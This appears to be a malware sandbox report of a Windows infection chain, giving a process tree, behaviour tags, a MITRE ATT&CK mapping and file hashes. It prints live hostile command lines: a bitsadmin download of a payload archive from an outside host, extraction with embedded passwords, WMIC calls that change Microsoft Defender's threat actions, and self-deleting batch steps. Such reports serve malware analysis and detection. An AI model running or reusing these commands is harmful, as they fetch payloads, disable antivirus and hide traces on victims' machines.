C:\Users\Admin\AppData\Local\Temp\6b-0f3ba-2b2-0f2a0-1bfb444c5963f\Fasonijishae.exe"C:\Users\Admin\AppData\Local\Temp\6b-0f3ba-2b2-0f2a0-1bfb444c5963f\Fasonijishae.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gechecrl.n4s\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\gechecrl.n4s\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\gechecrl.n4s\GcleanerEU.exe /eufive6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 2807⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mkw3y5u.owm\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\5mkw3y5u.owm\installer.exeC:\Users\Admin\AppData\Local\Temp\5mkw3y5u.owm\installer.exe /qn CAMPAIGN="654"6⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5mkw3y5u.owm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5mkw3y5u.owm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632951139 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksqeghz0.vvn\any.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ksqeghz0.vvn\any.exeC:\Users\Admin\AppData\Local\Temp\ksqeghz0.vvn\any.exe6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkvlkkre.03p\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\gkvlkkre.03p\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\gkvlkkre.03p\gcleaner.exe /mixfive6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2767⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4is5mbi.m23\autosubplayer.exe /S & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\u4is5mbi.m23\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\u4is5mbi.m23\autosubplayer.exe /S6⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK7⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK8⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszF797.tmp\tempfile.ps1"7⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15edb855a49.exeWed15edb855a49.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 2802⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 4523⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2412 -ip 24121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5072 -ip 50721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4604 -ip 46041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4692 -ip 46921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4520 -ip 45201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5228 -ip 52281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5528 -ip 55281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4172 -ip 41721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5272 -ip 52721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4172 -ip 41721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5552 -ip 55521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1488 -ip 14881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5452 -ip 54521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1484 -ip 14841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5192 -ip 51921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4264 -ip 42641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1012 -ip 10121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0C2158A8A5DBA07C9B12982A3EC4C5B9 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0FD8E5C34A76432ABE2A3DF679658ECA2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D584B871709333A9F35274E86942BB4A E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3856 -ip 38561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5648 -ip 56481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 1208 -ip 12081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7740 -ip 77401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2188 -ip 21881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\3E81.exeC:\Users\Admin\AppData\Local\Temp\3E81.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\3E81.exeC:\Users\Admin\AppData\Local\Temp\3E81.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4F3B.exeC:\Users\Admin\AppData\Local\Temp\4F3B.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4F3B.exeC:\Users\Admin\AppData\Local\Temp\4F3B.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2656 -ip 26561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 4563⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1160 -ip 11601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\BFC9.exeC:\Users\Admin\AppData\Local\Temp\BFC9.exe1⤵
-
C:\Users\Admin\AppData\Roaming\BFC9.exe"C:\Users\Admin\AppData\Roaming\BFC9.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "3⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\BFC9.exe3⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 04⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del BFC9.exe2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 03⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 6804 -ip 68041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 3976 -ip 39761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\E747.exeC:\Users\Admin\AppData\Local\Temp\E747.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6736 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\37B.exeC:\Users\Admin\AppData\Local\Temp\37B.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6736 -ip 67361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\231A.exeC:\Users\Admin\AppData\Local\Temp\231A.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 2762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 5128 -ip 51281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\5AC5.exeC:\Users\Admin\AppData\Local\Temp\5AC5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 22148 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True1⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 21652 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 21652 -ip 216521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 20536 -ip 205361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 20620 -ip 206201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 22148 -ip 221481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Users\Admin\AppData\Local\Temp\E1BD.exeC:\Users\Admin\AppData\Local\Temp\E1BD.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17104 -s 2762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 17104 -ip 171041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\F3FD.exeC:\Users\Admin\AppData\Local\Temp\F3FD.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\14.exeC:\Users\Admin\AppData\Local\Temp\14.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17428 -s 2762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 17428 -ip 174281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed150b6a68b74a9.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed150b6a68b74a9.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed151f5e3fd2.exeMD5
1b30ac88a74e6eff68433de176b3a5c3
SHA131039df81b419ae7f777672785c7bcf9e7004d04
SHA2560fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
SHA512c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed151f5e3fd2.exeMD5
